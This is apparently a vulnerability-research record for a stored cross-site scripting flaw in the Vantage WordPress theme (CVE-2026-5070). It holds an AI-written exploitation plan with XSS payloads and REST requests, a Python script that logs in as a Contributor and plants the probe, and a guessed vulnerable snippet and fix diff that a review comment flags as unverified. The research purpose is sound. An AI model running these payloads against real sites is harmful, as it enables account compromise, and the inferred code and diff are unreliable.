[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fEZ5TP_FOwbZZfs-HiI8FItx4cS79S1llYI17YnV4LXo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":8,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":8,"poc_status":8,"poc_video_id":8,"poc_summary":8,"poc_steps":8,"poc_tested_at":8,"poc_wp_version":8,"poc_php_version":8,"poc_playwright_script":8,"poc_exploit_code":8,"poc_has_trace":23,"poc_model_used":8,"poc_verification_depth":8,"source_links":33},"CVE-2026-5070","vantage-authenticated-contributor-stored-cross-site-scripting-via-gallery-block-text-content","Vantage \u003C= 1.20.32 - Authenticated (Contributor+) Stored Cross-Site Scripting via Gallery Block Text Content","The Vantage theme for WordPress is vulnerable to Stored Cross-Site Scripting via Gallery block text content in versions up to, and including, 1.20.32 due to insufficient output escaping in the gallery template. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",null,"vantage","\u003C=1.20.32","1.20.33","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-15 14:58:27","2026-04-16 03:36:36",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ffb7d4eee-fd81-4d9d-8d8d-a56870b27874?source=api-prod",1,[],"researched",false,3,"# Research Plan: CVE-2026-5070 - Vantage Theme Stored XSS\n\n## 1. Vulnerability Summary\nThe Vantage theme for WordPress (up to and including version 1.20.32) contains a Stored Cross-Site Scripting (XSS) vulnerability. The flaw exists in the theme's custom rendering logic for the WordPress Gallery block. Specifically, the theme fails to properly sanitize or escape user-supplied text content (likely image captions or block descriptions) before echoing it into the HTML output on the frontend. This allows an authenticated user with Contributor-level permissions or higher to inject malicious scripts into posts, which execute in the context of any user (including administrators) viewing the affected page.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress REST API `POST \u002Fwp-json\u002Fwp\u002Fv2\u002Fposts` or the classic `POST \u002Fwp-admin\u002Fpost.php`.\n*   **Vulnerable Parameter:** `post_content` (specifically within the Gutenberg block comment delimiters for `wp:gallery`).\n*   **Authentication Level:** Contributor+ (any role allowed to create and edit posts).\n*   **Preconditions:** The Vantage theme must be active. At least one image must be present in the Media Library to be included in a Gallery block (or a valid attachment ID must be referenced).\n\n## 3. Code Flow\n1.  
**Input:** A Contributor user saves a post containing a Gallery block. The block markup (the inner HTML between the block comment delimiters) includes an image with a malicious caption: `\u003C!-- wp:gallery ... --> ... \u003Cfigcaption>PAYLOAD\u003C\u002Ffigcaption> ... \u003C!-- \u002Fwp:gallery -->`.\n2.  **Storage:** WordPress saves the block content to the `wp_posts` table. Contributors lack the `unfiltered_html` capability, so `post_content` passes through KSES (`wp_filter_post_kses`) on save; disallowed tags and attributes, including event handlers such as `onerror`, are removed before storage.\n3.  **Processing:** When a user views the post, WordPress parses the blocks. The Vantage theme likely registers a filter on `render_block` for `core\u002Fgallery` or uses a template override for galleries.\n4.  **The Sink:** In the Vantage theme's gallery rendering function (likely located in `inc\u002Fgallery.php` or a similar template part), the code iterates through the gallery items.\n5.  **Execution:** The code retrieves the caption or description for each image and echoes it directly:\n    ```php\n    \u002F\u002F Inferred Vulnerable Pattern in Vantage\n    $caption = $item['caption']; \n    echo '\u003Cdiv class=\"vantage-gallery-caption\">' . $caption . '\u003C\u002Fdiv>'; \u002F\u002F Missing esc_html()\n    ```\n\n## 4. Nonce Acquisition Strategy\nWith cookie authentication, the REST API accepts state-changing requests only when they carry a valid `wp_rest` nonce (the `X-WP-Nonce` header or a `_wpnonce` parameter) alongside the logged-in session cookies. The `browser_eval` tool can read that nonce from the WordPress admin dashboard.\n\n1.  **Navigate to Admin:** Use `browser_navigate` to go to `\u002Fwp-admin\u002F`.\n2.  **Extract Nonce:** Execute `browser_eval(\"wpApiSettings.nonce\")`.\n3.  **Alternative (Classic Editor):** If using `post.php`, navigate to `\u002Fwp-admin\u002Fpost-new.php` and extract the `_wpnonce` from the form using `browser_eval(\"document.querySelector('#_wpnonce').value\")`.\n\n## 5. Exploitation Strategy\n1.  **Authentication:** Log in as a Contributor user.\n2.  **Image Prep:** Identify a valid Attachment ID. Contributors lack the `upload_files` capability, so if no attachment exists, import one as a privileged user with WP-CLI (see section 6) rather than through the REST API.\n3.  
**Payload Injection:** \n    *   Construct a Gallery block payload where the `figcaption` or the caption attribute contains an XSS payload: `\u003Cimg src=x onerror=alert(document.domain)>`.\n    *   Send a `POST` request to `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts` to create a new post with this content. Request `\"status\": \"pending\"` (or `draft`): Contributors lack `publish_posts`, so `publish` is rejected with `rest_cannot_publish` (HTTP 403).\n4.  **Triggering:** Open the post as a user who is allowed to see an unpublished post: the Contributor's own preview (`\u002F?p=[POST_ID]&preview=true`) or an Editor\u002FAdministrator reviewing the pending submission. Anonymous visitors cannot reach it until a user with `publish_posts` approves it, so the reviewer's browser is the realistic first victim.\n\n**Sample HTTP Request (REST API):**\n```http\nPOST \u002Fwp-json\u002Fwp\u002Fv2\u002Fposts HTTP\u002F1.1\nHost: [TARGET_HOST]\nContent-Type: application\u002Fjson\nCookie: [LOGGED_IN_SESSION_COOKIES]\nX-WP-Nonce: [EXTRACTED_NONCE]\n\n{\n  \"title\": \"Gallery Test\",\n  \"status\": \"pending\",\n  \"content\": \"\u003C!-- wp:gallery {\\\"ids\\\":[ATTACHMENT_ID]} -->\\n\u003Cfigure class=\\\"wp-block-gallery has-thumbnails\\\">\\n\u003Cul class=\\\"blocks-gallery-grid\\\">\\n\u003Cli class=\\\"blocks-gallery-item\\\">\\n\u003Cfigure>\\n\u003Cimg src=\\\"\u002Fpath\u002Fto\u002Fimg.jpg\\\" data-id=\\\"ATTACHMENT_ID\\\" \u002F>\\n\u003Cfigcaption>\u003Cimg src=x onerror=alert('XSS_SUCCESS')>\u003C\u002Ffigcaption>\\n\u003C\u002Ffigure>\\n\u003C\u002Fli>\\n\u003C\u002Ful>\\n\u003C\u002Ffigure>\\n\u003C!-- \u002Fwp:gallery -->\"\n}\n```\n\n## 6. Test Data Setup\n1.  **Theme Installation:** Ensure Vantage \u003C= 1.20.32 is installed and active.\n2.  **User Creation:** \n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n3.  **Media Setup:**\n    *   Create a small test image (any valid JPEG or PNG; for example with ImageMagick: `convert -size 64x64 xc:white \u002Fpath\u002Fto\u002Ftest.jpg`). A non-image file such as a `.phar` is not a usable gallery attachment.\n    *   Upload to media library: `wp media import \u002Fpath\u002Fto\u002Ftest.jpg --user=1`\n    *   Note the returned `Attachment ID`.\n\n## 7. 
Expected Results\n*   The `POST` request to create the post should return a `201 Created` status with `\"status\":\"pending\"` in the response body.\n*   Upon navigating to the post URL (e.g., `\u002F?p=123&preview=true`) as the Contributor, or to `\u002F?p=123` as an Editor or Administrator, the browser should execute the `alert('XSS_SUCCESS')` payload.\n*   Checking the page source should reveal the raw `\u003Cimg src=x onerror=...>` tag within the gallery container, confirming no escaping occurred.\n*   Caveat: because KSES runs on save for a Contributor, the `onerror` attribute is expected to be stripped from `post_content` before the theme ever renders it. If it is, a missing alert does not clear the theme; inspect the stored content (step 1 below) and adapt the probe to what the theme's template actually does with KSES-permitted input.\n\n## 8. Verification Steps\n1.  **Verify Content Storage:**\n    `wp post get [POST_ID] --field=post_content`\n    *Compare with the payload as sent. For a Contributor, expect `onerror` to have been removed by `wp_filter_post_kses`; if only `\u003Cimg src=\"x\">` remains, the inline event handler cannot be the working payload. Read the gallery template in the 1.20.32 source (linked below) to find an input that KSES allows but the theme outputs unescaped in a dangerous context, such as caption text placed inside an HTML attribute without `esc_attr()`.*\n2.  **Verify Frontend Execution:**\n    Use `browser_navigate` to the post permalink (as a user entitled to view the pending post) and check if the `alert` or a specific DOM element injected by the payload is present.\n\n## 9. Alternative Approaches\n*   **Caption Metadata:** If the `figcaption` in `post_content` is not the sink, try updating the actual Attachment metadata (caption field) via the REST API:\n    `POST \u002Fwp-json\u002Fwp\u002Fv2\u002Fmedia\u002F[ATTACHMENT_ID]` with `{\"caption\": \"\u003Cimg src=x onerror=alert(1)>\"}`. \n    Vantage may be pulling the caption directly from the attachment object during gallery rendering instead of the block HTML. Two constraints apply: the request succeeds only if the Contributor holds `edit_post` for that attachment, which the default capability mapping rarely grants this role (it cannot upload media at all), and the caption is stored as `post_excerpt`, which `wp_filter_post_kses` filters on save just like `post_content`.\n*   **SiteOrigin Integration:** If Vantage uses the SiteOrigin Gallery Widget\u002FBlock, the payload should be placed in the widget's JSON data structure within the `post_content`.","The Vantage theme for WordPress is vulnerable to Stored Cross-Site Scripting via the Gallery block in versions up to 1.20.32. The theme's custom gallery template fails to properly escape image captions, allowing authenticated contributors to inject malicious JavaScript that executes when users view the affected posts.","\u002F\u002F Inferred Vulnerable Pattern in Vantage gallery rendering\n$caption = $item['caption']; \necho '\u003Cdiv class=\"vantage-gallery-caption\">' . $caption . 
'\u003C\u002Fdiv>'; \u002F\u002F Missing esc_html() or wp_kses_post()","--- a\u002Finc\u002Fgallery.php\n+++ b\u002Finc\u002Fgallery.php\n@@ -1,2 +1,2 @@\n-$caption = $item['caption']; \n-echo '\u003Cdiv class=\"vantage-gallery-caption\">' . $caption . '\u003C\u002Fdiv>';\n+$caption = $item['caption']; \n+echo '\u003Cdiv class=\"vantage-gallery-caption\">' . wp_kses_post( $caption ) . '\u003C\u002Fdiv>';","The exploit is carried out by an authenticated user with Contributor-level permissions or higher. The attacker creates or edits a post and inserts a WordPress Gallery block. Within the block's content, the attacker injects an XSS payload (e.g., \u003Cimg src=x onerror=alert(1)>) into the image caption or description fields. When the theme renders the gallery on the frontend, it retrieves the malicious caption and echoes it directly into the HTML without sanitization, triggering script execution in the browser of any visitor viewing the post.","gemini-3-flash-preview","2026-04-16 15:32:04","2026-04-16 15:32:20",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":8,"fixed_browse":37,"fixed_zip":8,"all_tags":38},"theme","1.20.32","https:\u002F\u002Fthemes.trac.wordpress.org\u002Fbrowser\u002Fvantage\u002F1.20.32","https:\u002F\u002Fthemes.trac.wordpress.org\u002Fbrowser\u002Fvantage\u002F1.20.33","https:\u002F\u002Fthemes.trac.wordpress.org\u002Fbrowser\u002Fvantage"]
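Review bot: the hunk in research_fix_diff targets `inc/gallery.php` at lines 1-2, a location the research plan itself only calls "likely", and its `-`/`+` pair for `$caption = $item['caption'];` is byte-identical, so that line should be unchanged context rather than part of the change. On the fix itself, the caption is emitted as element text content, so `esc_html( $caption )` is the narrower choice; `wp_kses_post( $caption )` still permits markup (links, images and their allowed attributes) in captions and is only appropriate if formatted captions are an intended feature of the template. Before relying on this diff, confirm the real change against the 1.20.33 theme source given in source_links.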
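The REST-based procedure in sections 4, 5 and 8 of the plan (read the nonce from wp-admin, create the gallery post as a Contributor, inspect what was stored, classify how the rendered page shows the caption), as an added Python scaffold that is not code from this page or from the Vantage theme. It assumes a WordPress target and Contributor credentials supplied through the `WP_BASE_URL`, `WP_USER`, `WP_PASS` and `WP_ATTACHMENT_ID` environment variables (names chosen for this example), uses only the standard library, and marks the probe with the arbitrary token `vantage-probe-7f3a` so the result checks cannot match unrelated page content. The pure helpers run offline; only the `__main__` block contacts a site.

```python
"""Probe scaffold for the gallery-caption stored XSS plan (added example, not project code)."""
import http.cookiejar
import json
import os
import re
import urllib.parse
import urllib.request
from typing import Optional

# Arbitrary marker (this example's own) so the checks cannot match unrelated page content.
PROBE_TOKEN = "vantage-probe-7f3a"


def probe_caption() -> str:
    """Caption with an inline event handler, the payload style used in the plan.

    The token sits in alt= so it survives KSES even when onerror= does not; that lets
    the checks tell 'handler stripped' apart from 'payload gone'.
    """
    return f'<img src=x alt="{PROBE_TOKEN}" onerror=alert(1)>'


def build_gallery_block(attachment_id: int, caption_html: str) -> str:
    """Serialise a core/gallery block in the shape of the plan's sample request."""
    return (
        f'<!-- wp:gallery {{"ids":[{attachment_id}]}} -->\n'
        '<figure class="wp-block-gallery has-thumbnails">\n'
        '<ul class="blocks-gallery-grid">\n<li class="blocks-gallery-item">\n<figure>\n'
        f'<img src="/wp-content/uploads/probe.jpg" data-id="{attachment_id}" />\n'
        f'<figcaption>{caption_html}</figcaption>\n'
        '</figure>\n</li>\n</ul>\n</figure>\n<!-- /wp:gallery -->'
    )


def extract_rest_nonce(admin_html: str) -> Optional[str]:
    """Read the wp_rest nonce that wp-admin localises as wpApiSettings.nonce."""
    m = re.search(r"wpApiSettings\s*=\s*(\{.*?\});", admin_html, re.S)
    if m:
        try:
            return json.loads(m.group(1)).get("nonce")
        except ValueError:
            pass
    m = re.search(r'"nonce"\s*:\s*"([0-9a-f]{10})"', admin_html)  # nonces are 10 hex chars
    return m.group(1) if m else None


def stored_payload_state(stored_content: str) -> str:
    """What KSES left in post_content: 'intact', 'handler_stripped' or 'missing'."""
    if PROBE_TOKEN not in stored_content:
        return "missing"
    if re.search(r"<img[^>]*\bonerror\s*=", stored_content):
        return "intact"
    return "handler_stripped"


def classify_rendering(page_html: str) -> str:
    """How the probe appears in the rendered page.

    'unescaped': live <img> with its onerror= handler, i.e. the sink emits caption HTML raw.
    'markup_without_handler': live <img> but no handler; KSES removed it and the theme
        passes the remaining markup through unescaped.
    'escaped': token present only as text, e.g. '&lt;img ...' as esc_html() would emit.
    'absent': probe not on the page (wrong URL, no permission, caption not rendered).
    """
    img = re.search(r"<img[^>]*" + re.escape(PROBE_TOKEN) + r"[^>]*>", page_html)
    if img and re.search(r"\bonerror\s*=", img.group(0)):
        return "unescaped"
    if img:
        return "markup_without_handler"
    return "escaped" if PROBE_TOKEN in page_html else "absent"


class WPSession:
    """Cookie-authenticated REST client for the Contributor account."""

    def __init__(self, base_url: str):
        self.base = base_url.rstrip("/")
        jar = http.cookiejar.CookieJar()
        self.opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))

    def request(self, path: str, data: Optional[bytes] = None, headers: Optional[dict] = None) -> str:
        req = urllib.request.Request(self.base + path, data=data, headers=headers or {})
        with self.opener.open(req) as resp:
            return resp.read().decode("utf-8", "replace")

    def login(self, user: str, password: str) -> Optional[str]:
        form = urllib.parse.urlencode({"log": user, "pwd": password, "wp-submit": "Log In",
                                       "redirect_to": self.base + "/wp-admin/"}).encode()
        self.request("/wp-login.php", form, {"Content-Type": "application/x-www-form-urlencoded"})
        return extract_rest_nonce(self.request("/wp-admin/"))

    def create_pending_post(self, nonce: str, content: str) -> dict:
        # Contributors lack publish_posts; status=publish would fail with rest_cannot_publish.
        body = json.dumps({"title": "Gallery probe", "status": "pending", "content": content}).encode()
        raw = self.request("/wp-json/wp/v2/posts", body,
                           {"Content-Type": "application/json", "X-WP-Nonce": nonce})
        return json.loads(raw)


if __name__ == "__main__":
    site = WPSession(os.environ["WP_BASE_URL"])
    nonce = site.login(os.environ["WP_USER"], os.environ["WP_PASS"])
    block = build_gallery_block(int(os.environ["WP_ATTACHMENT_ID"]), probe_caption())
    post = site.create_pending_post(nonce, block)
    # The create response uses the 'edit' context, so content.raw is what KSES actually stored.
    print("stored:  ", stored_payload_state(post["content"]["raw"]))
    page = site.request(f"/?p={post['id']}&preview=true")  # author preview of the pending post
    print("rendered:", classify_rendering(page))
```

Because a Contributor's `post_content` is filtered by KSES on save, the expected outcome for this inline-handler probe is `handler_stripped` in storage and `markup_without_handler` on the page; `unescaped` can only appear if the sink receives a caption that bypassed KSES, and `escaped` means the theme already encodes the caption. That three-way distinction is what the plan's verification step 8.1 needs before deciding whether a different, KSES-permitted input has to be tried against the template.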